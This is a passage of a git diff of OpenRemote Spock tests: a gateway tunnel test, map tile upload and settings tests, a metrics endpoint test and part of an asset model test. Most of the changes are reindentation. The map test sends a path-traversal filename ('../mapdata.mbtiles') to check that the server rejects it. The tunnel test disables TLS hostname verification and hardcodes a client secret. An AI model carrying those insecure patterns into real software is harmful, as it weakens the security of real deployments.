-        given: "the container environment is started"
-
-        def sshKeyPath = Paths.get("deployment/sish/client/client")
-
-
-        def conditions = new PollingConditions(timeout: 6000, delay: 0.2)
-        // The port where this test's manager webserver will run. cannot use random ephemeral port because of
-        // its randomization, which when generating the gateway tunnel ID, will then generate a different gateway ID each time.
-        def webserverPort = 12345
-        def config = defaultConfig(webserverPort)
-        def container = startContainer(config << [(GatewayService.OR_GATEWAY_TUNNEL_SSH_KEY_FILE): sshKeyPath.toAbsolutePath().toString()], defaultServices())
-        def gatewayClientService = container.getService(GatewayClientService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-
-        and: "Central Instance information with tunnelling enabled"
-
-        def centralInstanceHostname = "localhost"
-        def centralInstancePort = 443
-        def isCentralInstanceSecure = (centralInstancePort == 443)
-        def centralInstanceRealm = managerTestSetup.realmMasterName
-        def centralInstanceAutoCloseMinutes = 2
-        def gatewayClientId = "gateway-5bpoensnt4kaoobkp1fwzo"
-        def gatewayClientSecret = "86a4fdff-3fc0-4b42-a276-82cb9862a623"
-        def gatewayAssetId = "5bPOENSnt4kaoObkP1FWZO"
-
-        def accessToken = authenticate(
-                (isCentralInstanceSecure),
-                centralInstanceHostname,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-        def gatewayResource = getClientApiTarget(serverUri((isCentralInstanceSecure), centralInstanceHostname, centralInstancePort), MASTER_REALM, accessToken).proxy(GatewayServiceResource.class)
-
-        when: "a new gateway client connection is created to connect to the central instance"
-
-        def gatewayConnection = new GatewayConnection(
-                managerTestSetup.realmCityName,
-                centralInstanceHostname,
-                centralInstancePort,
-                centralInstanceRealm,
-                gatewayClientId,
-                gatewayClientSecret,
-                (isCentralInstanceSecure),
-                null,
-                Map.of("test", new GatewayAssetSyncRule()),
-                false
-        )
-
-        gatewayClientService.setConnection(gatewayConnection)
-
-        then: "the gateway client should become connected"
-        conditions.eventually {
-            assert gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName) != null
-        }
-
-        and: "the gateway connection status should become CONNECTED"
-        conditions.eventually {
-            assert gatewayClientService.getConnectionStatus(managerTestSetup.realmCityName) == ConnectionStatus.CONNECTED
-        }
-
-        and: "Tunnelling is supported in this gateway"
-        assert gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName).tunnelFactory != null
-
-        when: "We suspend the thread to allow the tunnel to settle"
-        Thread.sleep(5000)
-
-        and: "we request (from the central manager) for a new tunnel to be created"
-        def tunnelInfo = new GatewayTunnelInfo(
-                centralInstanceRealm,
-                gatewayAssetId,
-                GatewayTunnelInfo.Type.HTTP,
-                "localhost",
-                webserverPort)
-
-        def centralManagerTunnelInfo = gatewayResource.startTunnel(tunnelInfo);
-
-        then: "gateway should have been opened"
-
-        conditions.eventually {
-            def res = gatewayResource.getAllActiveTunnelInfos(null, centralInstanceRealm);
-            print(res)
-            assert Arrays.stream(res).anyMatch({ info -> info.id == tunnelInfo.getId() })
-            assert gatewayClientService.activeTunnels.mappingCount() == 1
-        }
-
-        /*
-        At this point, a gateway has been created from the central instance to the gateway that is running on this test.
-
-        We can now request `/auth` from the tunnel URL, and the request route would look like this:
-        This Groovy test --> Central Instance --> Sish --> Gateway Proxy --> Keycloak/Manager
-
-        For the "Sish --> Gateway Proxy" request to be routed correctly, we need to edit our local `/etc/hosts` file
-        to route the <tunnelid>.<tunnelSSHHost> to localhost, like this:
-
-        127.0.0.1       gw-5fj1sxvwwfp7wvgqgve91n.localhost
-
-        If that is setup, the request correctly routes through the tunnel to the gateway, and we can request the edge manager.
-
-        To assert proper connectivity, we are going to request a new admin token from the tunnel URL to make sure the
-        Keycloak connection works, but also request the server info, which proves that the request has reached the manager
-        webserver.
-
-        * */
-        and: "We request a new admin token from the tunnel URL"
-
-        def token = authenticate(true,
-                centralManagerTunnelInfo.id + "." + centralManagerTunnelInfo.hostname,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT))
-
-        when: "We request the info endpoint of the currently running manager"
-
-        String scheme   = isCentralInstanceSecure ? "https" : "http"
-        String basePath = "/api/master"
-        String baseUrl  = "${scheme}://$centralManagerTunnelInfo.id.$centralManagerTunnelInfo.hostname$basePath"
-        // TODO: Use WebTarget class and built in client for this
-        ResteasyClient client = ResteasyClientBuilder.newBuilder().hostnameVerifier { String h, SSLSession s -> true }.build()
-        ResteasyWebTarget target = (ResteasyWebTarget) client.target(baseUrl)
-
-        then: "The request should be successful"
-        conditions.eventually {
-            def info = target.proxy(StatusResource.class).getInfo()
-
-            assert info != null
-            assert info.size() > 0
-        }
-
-
-        and: "The test has been correctly configured to auto-stop by the gateway itself"
-        conditions.eventually {
-            assert gatewayClientService.tunnelAutoCloseTasks.mappingCount() == 1
-            assert gatewayClientService.tunnelAutoCloseTasks.get(centralManagerTunnelInfo.getId()) != null
-        }
-
-        when: "The timer is advanced forward by central instance's OR_GATEWAY_TUNNEL_AUTO_CLOSE_MINUTES to trigger auto-close"
-        //TODO: This actually doesn't work.
-        //the autoClose tunnel task is scheduled by the ScheduledExecutor, which is on a timeout basis, not a clock basis.
-
-        advancePseudoClock(Duration.ofMinutes(centralInstanceAutoCloseMinutes).toMillis(), TimeUnit.MILLISECONDS)
-
-        then: "The tunnel should be closed automatically by the gateway"
-        conditions.eventually {
-            assert gatewayClientService.tunnelAutoCloseTasks.mappingCount() == 0
-        }
-
+    and: "The test has been correctly configured to auto-stop by the gateway itself"
+    conditions.eventually {
+      assert gatewayClientService.tunnelAutoCloseTasks.mappingCount() == 1
+      assert gatewayClientService.tunnelAutoCloseTasks.get(centralManagerTunnelInfo.getId()) != null
     }
+
+    when: "The timer is advanced forward by central instance's OR_GATEWAY_TUNNEL_AUTO_CLOSE_MINUTES to trigger auto-close"
+    //TODO: This actually doesn't work.
+    //the autoClose tunnel task is scheduled by the ScheduledExecutor, which is on a timeout basis, not a clock basis.
+
+    advancePseudoClock(Duration.ofMinutes(centralInstanceAutoCloseMinutes).toMillis(), TimeUnit.MILLISECONDS)
+
+    then: "The tunnel should be closed automatically by the gateway"
+    conditions.eventually {
+      assert gatewayClientService.tunnelAutoCloseTasks.mappingCount() == 0
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/map/MapResourceTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/map/MapResourceTest.groovy
@@ -41,51 +41,51 @@ import static org.openremote.model.Constants.*
 
 // TODO: Remove this once map service is removed and we fallback to standalone tile server
 class MapResourceTest extends Specification implements ManagerContainerTrait {
-    @Shared
-    static ResteasyWebTarget clientTarget
+  @Shared
+  static ResteasyWebTarget clientTarget
 
-    @Shared
-    static MapResource mapResource
+  @Shared
+  static MapResource mapResource
 
-    def setupSpec() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
+  def setupSpec() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
 
-        and: "an access_token is retrieved"
-        def realm = MASTER_REALM
-        def accessToken = authenticate(
-                container,
-                realm,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    and: "an access_token is retrieved"
+    def realm = MASTER_REALM
+    def accessToken = authenticate(
+            container,
+            realm,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
 
-        and: "a test client target set"
-        clientTarget = getClientApiTarget(serverUri(serverPort), realm, accessToken)
+    and: "a test client target set"
+    clientTarget = getClientApiTarget(serverUri(serverPort), realm, accessToken)
 
-        and: "the map resource is configured"
-        mapResource = clientTarget.proxy(MapResource.class)
-    }
+    and: "the map resource is configured"
+    mapResource = clientTarget.proxy(MapResource.class)
+  }
 
-    def "Retrieve map settings"() {
-        when: "a request has been made"
-        def mapSettings = mapResource.getSettings(null)
+  def "Retrieve map settings"() {
+    when: "a request has been made"
+    def mapSettings = mapResource.getSettings(null)
 
-        then: "settings should be not-null"
-        mapSettings != null
+    then: "settings should be not-null"
+    mapSettings != null
 
-        and: "JSON content is valid"
-        def json = new JsonSlurper().parseText(ValueUtil.asJSON(mapSettings).orElse("null"))
-        json.options != null
-        json.options.default != null
-        json.options.default.center.size() >= 2
-        json.options.default.bounds.size() == 4
-        json.sources != null
-        json.layers.size() > 0
+    and: "JSON content is valid"
+    def json = new JsonSlurper().parseText(ValueUtil.asJSON(mapSettings).orElse("null"))
+    json.options != null
+    json.options.default != null
+    json.options.default.center.size() >= 2
+    json.options.default.bounds.size() == 4
+    json.sources != null
+    json.layers.size() > 0
 
-        when: "custom sprite and glyphs are saved"
-        mapSettings = ValueUtil.parse("""{
+    when: "custom sprite and glyphs are saved"
+    mapSettings = ValueUtil.parse("""{
             "options" : { "default": {} },
             "sources" : {
                 "vector_tiles" : {
@@ -97,18 +97,18 @@ class MapResourceTest extends Specification implements ManagerContainerTrait {
             "sprite": "https://api.example.com/maps/streets/sprite",
             "glyphs": "https://api.example.com/fonts/{fontstack}/{range}.pbf"
         }""", MapConfig.class)
-        (ObjectNode)mapResource.saveSettings(null, mapSettings.get())
+    (ObjectNode)mapResource.saveSettings(null, mapSettings.get())
 
-        and: "retrieve map settings"
-        mapSettings = mapResource.getSettings(null)
+    and: "retrieve map settings"
+    mapSettings = mapResource.getSettings(null)
 
-        then: "JSON content should contain custom sprite and glyphs URLs"
-        def json1 = new JsonSlurper().parseText(ValueUtil.asJSON(mapSettings).orElse("null"))
-        json1.sprite == "https://api.example.com/maps/streets/sprite"
-        json1.glyphs == "https://api.example.com/fonts/{fontstack}/{range}.pbf"
+    then: "JSON content should contain custom sprite and glyphs URLs"
+    def json1 = new JsonSlurper().parseText(ValueUtil.asJSON(mapSettings).orElse("null"))
+    json1.sprite == "https://api.example.com/maps/streets/sprite"
+    json1.glyphs == "https://api.example.com/fonts/{fontstack}/{range}.pbf"
 
-        when: "saving without sprite and glyphs"
-        mapSettings = ValueUtil.parse("""{
+    when: "saving without sprite and glyphs"
+    mapSettings = ValueUtil.parse("""{
             "options" : { "default": {} },
             "sources" : {
                 "vector_tiles" : {
@@ -118,88 +118,88 @@ class MapResourceTest extends Specification implements ManagerContainerTrait {
                 }
             }
         }""", MapConfig.class)
-        (ObjectNode)mapResource.saveSettings(null, mapSettings.get())
+    (ObjectNode)mapResource.saveSettings(null, mapSettings.get())
 
-        and: "retrieve map settings"
-        mapSettings = mapResource.getSettings(null)
+    and: "retrieve map settings"
+    mapSettings = mapResource.getSettings(null)
 
-        then: "JSON content should contain default sprite and glyphs URLs"
-        def json2 = new JsonSlurper().parseText(ValueUtil.asJSON(mapSettings).orElse("null"))
-        json2.sprite == "http://127.0.0.1:" + serverPort + MapService.MAP_SHARED_DATA_BASE_URI + "/" + MapService.DEFAULT_SPRITE_PATH
-        json2.glyphs == "http://127.0.0.1:" + serverPort + MapService.MAP_SHARED_DATA_BASE_URI + "/fonts/" + MapService.DEFAULT_GLYPHS_PATH
+    then: "JSON content should contain default sprite and glyphs URLs"
+    def json2 = new JsonSlurper().parseText(ValueUtil.asJSON(mapSettings).orElse("null"))
+    json2.sprite == "http://127.0.0.1:" + serverPort + MapService.MAP_SHARED_DATA_BASE_URI + "/" + MapService.DEFAULT_SPRITE_PATH
+    json2.glyphs == "http://127.0.0.1:" + serverPort + MapService.MAP_SHARED_DATA_BASE_URI + "/fonts/" + MapService.DEFAULT_GLYPHS_PATH
+  }
+
+  def "Upload custom map tiles"() {
+    when: "valid tiles are uploaded"
+    def response = clientTarget
+            .path("map/upload")
+            .queryParam("filename", "eindhoven.mbtiles")
+            .request()
+            .post(Entity.entity(Files.readAllBytes(Path.of("manager/src/map/mapdata.mbtiles")), MediaType.APPLICATION_OCTET_STREAM_TYPE))
+
+    then: "the custom tiles should be saved"
+    new PollingConditions(timeout: 20, delay: 1).eventually {
+      assert Files.exists(Path.of("tmp/map/eindhoven.mbtiles"))
     }
 
-    def "Upload custom map tiles"() {
-        when: "valid tiles are uploaded"
-        def response = clientTarget
-                .path("map/upload")
-                .queryParam("filename", "eindhoven.mbtiles")
-                .request()
-                .post(Entity.entity(Files.readAllBytes(Path.of("manager/src/map/mapdata.mbtiles")), MediaType.APPLICATION_OCTET_STREAM_TYPE))
+    and: "and the mapsettings match with the custom mbtiles metadata"
+    def json = ValueUtil.JSON.readValue(response.getEntity(), MapConfig.class)
+    json.options != null
+    json.options.default != null
+    json.options.default.center.size() == 3
+    json.options.default.bounds.size() == 4
+    json.sources != null
 
-        then: "the custom tiles should be saved"
-        new PollingConditions(timeout: 20, delay: 1).eventually {
-            assert Files.exists(Path.of("tmp/map/eindhoven.mbtiles"))
-        }
+    when: "invalid tiles are uploaded"
+    mapResource.deleteMap(null)
 
-        and: "and the mapsettings match with the custom mbtiles metadata"
-        def json = ValueUtil.JSON.readValue(response.getEntity(), MapConfig.class)
-        json.options != null
-        json.options.default != null
-        json.options.default.center.size() == 3
-        json.options.default.bounds.size() == 4
-        json.sources != null
+    then: "an internal server error should occur"
+    !Files.exists(Path.of("tmp/map/eindhoven.mbtiles"))
 
-        when: "invalid tiles are uploaded"
-        mapResource.deleteMap(null)
-
-        then: "an internal server error should occur"
-        !Files.exists(Path.of("tmp/map/eindhoven.mbtiles"))
-
-        when: "invalid tiles are uploaded"
-        response = clientTarget
+    when: "invalid tiles are uploaded"
+    response = clientTarget
             .path("map/upload")
             .queryParam("filename", "eindhoven.mbtiles")
             .request()
             .post(Entity.entity(Files.readAllBytes(Path.of("manager/src/map/mapsettings.json")), MediaType.APPLICATION_OCTET_STREAM_TYPE))
 
-        then: "an internal server error should occur"
-        response.withCloseable { r ->
-            assert r.status == 500
-            return true
-        }
-
-        when: "illegal filename was specified"
-        response = clientTarget
-                .path("map/upload")
-                .queryParam("filename", "../mapdata.mbtiles")
-                .request()
-                .post(Entity.entity(Files.readAllBytes(Path.of("manager/src/map/mapdata.mbtiles")), MediaType.APPLICATION_OCTET_STREAM_TYPE))
-
-        then: "bad request error should occur"
-        response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "the tiles are too large"
-        container.getService(MapService.class).customMapLimit = 10
-        response = clientTarget
-                .path("map/upload")
-                .queryParam("filename", "mapdata.mbtiles")
-                .request()
-                .post(Entity.entity(Files.readAllBytes(Path.of("manager/src/map/mapdata.mbtiles")), MediaType.APPLICATION_OCTET_STREAM_TYPE))
-
-        then: "request entity too large error should occur"
-        response.withCloseable { r ->
-            assert r.status == 413
-            return true
-        }
+    then: "an internal server error should occur"
+    response.withCloseable { r ->
+      assert r.status == 500
+      return true
     }
 
-    def "Configure custom tile server URL"() {
-        when: "mapsettings with a valid tile server URL is configured"
-        def mapSettings = ValueUtil.parse("""{
+    when: "illegal filename was specified"
+    response = clientTarget
+            .path("map/upload")
+            .queryParam("filename", "../mapdata.mbtiles")
+            .request()
+            .post(Entity.entity(Files.readAllBytes(Path.of("manager/src/map/mapdata.mbtiles")), MediaType.APPLICATION_OCTET_STREAM_TYPE))
+
+    then: "bad request error should occur"
+    response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "the tiles are too large"
+    container.getService(MapService.class).customMapLimit = 10
+    response = clientTarget
+            .path("map/upload")
+            .queryParam("filename", "mapdata.mbtiles")
+            .request()
+            .post(Entity.entity(Files.readAllBytes(Path.of("manager/src/map/mapdata.mbtiles")), MediaType.APPLICATION_OCTET_STREAM_TYPE))
+
+    then: "request entity too large error should occur"
+    response.withCloseable { r ->
+      assert r.status == 413
+      return true
+    }
+  }
+
+  def "Configure custom tile server URL"() {
+    when: "mapsettings with a valid tile server URL is configured"
+    def mapSettings = ValueUtil.parse("""{
             "options" : { "default": {} },
             "sources" : {
                 "vector_tiles" : {
@@ -212,17 +212,17 @@ class MapResourceTest extends Specification implements ManagerContainerTrait {
             "sprite": "https://api.example.com/maps/streets/sprite",
             "glyphs": "https://api.example.com/fonts/{fontstack}/{range}.pbf"
         }""", MapConfig.class)
-        def savedSettings = (ObjectNode)mapResource.saveSettings(null, mapSettings.get())
+    def savedSettings = (ObjectNode)mapResource.saveSettings(null, mapSettings.get())
 
-        then: "the custom tile server URL should be returned"
-        savedSettings.get("sources").get("vector_tiles").get("url").textValue() == "https://example.com/tileset/tile.json"
-        savedSettings.get("sources").get("vector_tiles").get("tiles").get(0).textValue() == "https://example.com/tileset/{z}/{x}/{y}.mvt"
-        savedSettings.get("sprite").textValue() == "https://api.example.com/maps/streets/sprite"
-        savedSettings.get("glyphs").textValue() == "https://api.example.com/fonts/{fontstack}/{range}.pbf"
-        savedSettings.get("layers").isArray() && savedSettings.get("layers").size() > 0
+    then: "the custom tile server URL should be returned"
+    savedSettings.get("sources").get("vector_tiles").get("url").textValue() == "https://example.com/tileset/tile.json"
+    savedSettings.get("sources").get("vector_tiles").get("tiles").get(0).textValue() == "https://example.com/tileset/{z}/{x}/{y}.mvt"
+    savedSettings.get("sprite").textValue() == "https://api.example.com/maps/streets/sprite"
+    savedSettings.get("glyphs").textValue() == "https://api.example.com/fonts/{fontstack}/{range}.pbf"
+    savedSettings.get("layers").isArray() && savedSettings.get("layers").size() > 0
 
-        when: "an invalid tile server URL is configured"
-        mapSettings = ValueUtil.parse("""{
+    when: "an invalid tile server URL is configured"
+    mapSettings = ValueUtil.parse("""{
             "options" : { "default": {} },
             "sources" : {
                 "vector_tiles" : {
@@ -232,13 +232,13 @@ class MapResourceTest extends Specification implements ManagerContainerTrait {
                 }
             }
         }""", MapConfig.class)
-        savedSettings = (ObjectNode)mapResource.saveSettings(null, mapSettings.get())
+    savedSettings = (ObjectNode)mapResource.saveSettings(null, mapSettings.get())
 
-        then: "the URL should be reset back to normal"
-        !savedSettings.get("sources").get("vector_tiles").has("tiles")
-        savedSettings.get("sources").get("vector_tiles").get("url").textValue() == MapService.DEFAULT_VECTOR_TILES_URL
-        savedSettings.get("sprite").textValue() == MapService.DEFAULT_SPRITE_PATH
-        savedSettings.get("glyphs").textValue() == MapService.DEFAULT_GLYPHS_PATH
-        savedSettings.get("layers").isArray() && savedSettings.get("layers").size() > 0
-    }
+    then: "the URL should be reset back to normal"
+    !savedSettings.get("sources").get("vector_tiles").has("tiles")
+    savedSettings.get("sources").get("vector_tiles").get("url").textValue() == MapService.DEFAULT_VECTOR_TILES_URL
+    savedSettings.get("sprite").textValue() == MapService.DEFAULT_SPRITE_PATH
+    savedSettings.get("glyphs").textValue() == MapService.DEFAULT_GLYPHS_PATH
+    savedSettings.get("layers").isArray() && savedSettings.get("layers").size() > 0
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/metrics/MetricsEndpointTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/metrics/MetricsEndpointTest.groovy
@@ -29,39 +29,38 @@ import static org.openremote.model.Constants.MASTER_REALM
 
 class MetricsEndpointTest extends Specification implements ManagerContainerTrait {
 
-    def "Test metrics endpoint existence and content"() {
+  def "Test metrics endpoint existence and content"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig() << [(Config.OR_METRICS_ENABLED): "true"], defaultServices())
+    and: "the container is started"
+    def container = startContainer(defaultConfig() << [(Config.OR_METRICS_ENABLED): "true"], defaultServices())
 
-        and: "a resource client is created"
-        // Resteasy client has issues with @Suspended annotation so not used for now
-        //def datapointResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetDatapointResource.class)
-        def requestTarget = getClientTarget(serverUri(HealthService.OR_METRICS_PORT_DEFAULT).path("metrics"), null)
+    and: "a resource client is created"
+    // Resteasy client has issues with @Suspended annotation so not used for now
+    //def datapointResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetDatapointResource.class)
+    def requestTarget = getClientTarget(serverUri(HealthService.OR_METRICS_PORT_DEFAULT).path("metrics"), null)
 
-        when: "requesting the metrics endpoint"
-        def response = requestTarget.request().get()
+    when: "requesting the metrics endpoint"
+    def response = requestTarget.request().get()
 
-        then: "the response should contain metrics data"
-        response.withCloseable { r ->
-            def responseStr = r.readEntity(String.class)
-            assert responseStr.contains("executor_pool_core_threads{name=\"ContainerExecutor\"}")
-            assert responseStr.contains("jvm_info")
-            assert responseStr.contains("jvm_buffer_")
-            assert responseStr.contains("jvm_gc_")
-            assert responseStr.contains("jvm_memory_")
-            assert responseStr.contains("jvm_threads_")
-            assert r.status == 200
-            return true
-        }
-
-        cleanup: "clean up"
-        if (response != null) {
-            response.close()
-        }
+    then: "the response should contain metrics data"
+    response.withCloseable { r ->
+      def responseStr = r.readEntity(String.class)
+      assert responseStr.contains("executor_pool_core_threads{name=\"ContainerExecutor\"}")
+      assert responseStr.contains("jvm_info")
+      assert responseStr.contains("jvm_buffer_")
+      assert responseStr.contains("jvm_gc_")
+      assert responseStr.contains("jvm_memory_")
+      assert responseStr.contains("jvm_threads_")
+      assert r.status == 200
+      return true
     }
 
+    cleanup: "clean up"
+    if (response != null) {
+      response.close()
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/model/AssetModelTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/model/AssetModelTest.groovy
@@ -73,606 +73,797 @@ import static org.openremote.model.value.ValueType.BIG_NUMBER
 // TODO: Define new asset model tests (setValue - equality checking etc.)
 class AssetModelTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static AssetModelResource assetModelResource
-    @Shared
-    static AssetStorageService assetStorageService
+  @Shared
+  static AssetModelResource assetModelResource
+  @Shared
+  static AssetStorageService assetStorageService
 
-    static String CUSTOM_ASSET_TYPE = "CustomAsset"
-    static ValueDescriptor[] dynamicValueDescriptors = [new ValueDescriptor("dynamicValue", null, ValueConstraint.constraints(new ValueConstraint.AllowedValues("value1", "value2")), null, null, null)]
+  static String CUSTOM_ASSET_TYPE = "CustomAsset"
+  static ValueDescriptor[] dynamicValueDescriptors = [
+    new ValueDescriptor("dynamicValue", null, ValueConstraint.constraints(new ValueConstraint.AllowedValues("value1", "value2")), null, null, null)
+  ]
 
-    def setupSpec() {
-        // A dynamic asset type is added
-        def storageDir = Paths.get(PersistenceService.OR_STORAGE_DIR_DEFAULT, AssetModelService.DIRECTORY_NAME)
-        Files.createDirectories(storageDir)
-        MetaItemDescriptor[] dynamicMetaDescriptors = [new MetaItemDescriptor("dynamicMeta", dynamicValueDescriptors[0])]
-        AttributeDescriptor[] dynamicAttributeDescriptors = [
-                new AttributeDescriptor<>("dynamic1", dynamicValueDescriptors[0]),
-                new AttributeDescriptor<>("dynamic2", ValueType.POSITIVE_INTEGER).withOptional(true)
-        ]
-        def dynamicAssetDescriptor = new AssetDescriptor(CUSTOM_ASSET_TYPE, "", "")
-        def assetTypeInfo = new AssetTypeInfo(dynamicAssetDescriptor, dynamicAttributeDescriptors, dynamicMetaDescriptors, dynamicValueDescriptors)
-        def assetTypeInfoStr = AssetModelService.JSON.writeValueAsString(assetTypeInfo)
-        Files.writeString(storageDir.resolve("CustomAsset"), assetTypeInfoStr, StandardOpenOption.CREATE, StandardOpenOption.WRITE)
-        startContainer(defaultConfig(), defaultServices())
-        // Ensure the asset model is re-initialised (just in case container is reused)
-        container.getService(AssetModelService).initDynamicModel()
-        ValueUtil.doInitialise()
-        assetModelResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM).proxy(AssetModelResource.class)
-        assetStorageService = container.getService(AssetStorageService.class)
-    }
+  def setupSpec() {
+    // A dynamic asset type is added
+    def storageDir = Paths.get(PersistenceService.OR_STORAGE_DIR_DEFAULT, AssetModelService.DIRECTORY_NAME)
+    Files.createDirectories(storageDir)
+    MetaItemDescriptor[] dynamicMetaDescriptors = [new MetaItemDescriptor("dynamicMeta", dynamicValueDescriptors[0])]
+    AttributeDescriptor[] dynamicAttributeDescriptors = [
+      new AttributeDescriptor<>("dynamic1", dynamicValueDescriptors[0]),
+      new AttributeDescriptor<>("dynamic2", ValueType.POSITIVE_INTEGER).withOptional(true)
+    ]
+    def dynamicAssetDescriptor = new AssetDescriptor(CUSTOM_ASSET_TYPE, "", "")
+    def assetTypeInfo = new AssetTypeInfo(dynamicAssetDescriptor, dynamicAttributeDescriptors, dynamicMetaDescriptors, dynamicValueDescriptors)
+    def assetTypeInfoStr = AssetModelService.JSON.writeValueAsString(assetTypeInfo)
+    Files.writeString(storageDir.resolve("CustomAsset"), assetTypeInfoStr, StandardOpenOption.CREATE, StandardOpenOption.WRITE)
+    startContainer(defaultConfig(), defaultServices())
+    // Ensure the asset model is re-initialised (just in case container is reused)
+    container.getService(AssetModelService).initDynamicModel()
+    ValueUtil.doInitialise()
+    assetModelResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM).proxy(AssetModelResource.class)
+    assetStorageService = container.getService(AssetStorageService.class)
+  }
 
-    def "Check AttributeMap equality checking"() {
-        given: "required services"
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
+  def "Check AttributeMap equality checking"() {
+    given: "required services"
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
 
-        when: "we take the AttributeMap of an asset and serialize it then deserialize it"
-        def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id)
-        def attributeMapJson = ValueUtil.asJSON(apartment1.attributes).orElseThrow()
-        def attributes1 = ValueUtil.parse(attributeMapJson, AttributeMap).orElse(null)
-        def attributes2 = ValueUtil.parse(attributeMapJson, AttributeMap).orElse(null)
+    when: "we take the AttributeMap of an asset and serialize it then deserialize it"
+    def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id)
+    def attributeMapJson = ValueUtil.asJSON(apartment1.attributes).orElseThrow()
+    def attributes1 = ValueUtil.parse(attributeMapJson, AttributeMap).orElse(null)
+    def attributes2 = ValueUtil.parse(attributeMapJson, AttributeMap).orElse(null)
 
-        then: "attributes should be equal"
-        Objects.equals(attributes1, attributes2)
-    }
+    then: "attributes should be equal"
+    Objects.equals(attributes1, attributes2)
+  }
 
-    def "Serialise/Deserialise asset and attribute events and test validation"() {
+  def "Serialise/Deserialise asset and attribute events and test validation"() {
 
-        given: "an authenticated admin user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-        stopPseudoClock()
-
-        and: "the asset resource"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-
-        expect: "the custom asset type to be loaded"
-        ValueUtil.getAssetDescriptor("CustomAsset").isPresent()
-
-        when: "A well known asset is instantiated"
-        def persistenceService = container.getService(PersistenceService.class)
-        def timerService = container.getService(TimerService.class)
-        def modelTestAsset = new ModelTestAsset("Test Asset")
-        modelTestAsset.setRealm("master")
-
-        and: "try to save the asset without meeting constraints on required attributes"
-        assetResource.create(null, modelTestAsset)
-
-        then: "a constraint violation exception should be thrown"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-        def report = ex.response.readEntity(ViolationReport)
-        report.propertyViolations.size() == 1
-        report.propertyViolations.get(0).path == "attributes[positiveInt].value"
-        report.propertyViolations.get(0).message == "must not be null"
-        report.classViolations.size() == 1
-        report.classViolations.get(0).path == ""
-        report.classViolations.get(0).message == "Asset is not valid"
-
-        when: "the issue is fixed and the asset is saved again"
-        modelTestAsset.getAttribute(ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR).map(attr -> attr.setValue(1))
-        modelTestAsset = assetResource.create(null, modelTestAsset)
-
-        then: "the save should succeed"
-        modelTestAsset != null
-        modelTestAsset.getAttribute(ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == 1
-
-        when: "other optional attributes are added with valid values"
-        modelTestAsset.addAttributes(
-                new Attribute<>(ModelTestAsset.NEGATIVE_INT_ATTRIBUTE_DESCRIPTOR, -1),
-                new Attribute<>(ModelTestAsset.SIZE_STRING_ATTRIBUTE_DESCRIPTOR, "abcde"),
-                new Attribute<>(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR, [
-                        ("key1"): 1d,
-                        ("key2"): 2d,
-                        ("key3"): 3d
-                ] as ValueType.DoubleMap
-            ),
-                new Attribute<>(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR, [
-                        "arrayValue1",
-                        "arrayValue2"
-                ] as String[]),
-                new Attribute<>(ModelTestAsset.ALLOWED_VALUES_ENUM_ATTRIBUTE_DESCRIPTOR, ModelTestAsset.TestValue.ENUM_2).addMeta(
-                        new MetaItem<>(MetaItemType.CONSTRAINTS, ValueConstraint.constraints(new ValueConstraint.NotNull()))
-                ),
-                new Attribute<>(ModelTestAsset.ALLOWED_VALUES_STRING_ATTRIBUTE_DESCRIPTOR, "Allowed1"),
-                new Attribute<>(ModelTestAsset.ALLOWED_VALUES_NUMBER_ATTRIBUTE_DESCRIPTOR, 1.5d),
